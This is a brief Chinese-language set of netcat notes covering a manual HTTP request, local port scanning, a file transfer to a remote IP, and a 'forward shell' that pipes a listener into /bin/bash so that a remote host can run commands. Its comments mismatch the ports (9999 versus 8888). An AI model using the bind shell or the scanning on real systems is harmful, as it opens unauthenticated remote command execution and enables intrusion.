nc www.baidu.com 80
GET / HTTP/1.0
(回车)
(回车)

nc -zv localhost 9995-9999
-z参数表示使用Zero-I/O模式，即连接的时候禁止输入输出，仅查看端口是否开启，很适合用于做端口扫描。
-v参数用来显示网络连接中的详细输出信息。根据输出信息可以看出，9999端口能连上，证明9999端口开发着

两台机器建立连接
nc -l 8888					监听9999端口
nc 43.143.18.42 8888		连接9999端口

服务器A上的test.txt发送到服务器B(IP地址为43.143.18.42)上
nc -l 8888 > test.txt				在B服务器执行
nc 43.143.18.42 8888 < test.txt		在A服务器执行

正向shell
nc -l 8888 | /bin/bash		监听8888端口，将接收到的信息用/bin/bash执行
nc 43.143.18.42 8888		连接目标主机，能够将命令发送给目标执行，不过无法看到回显



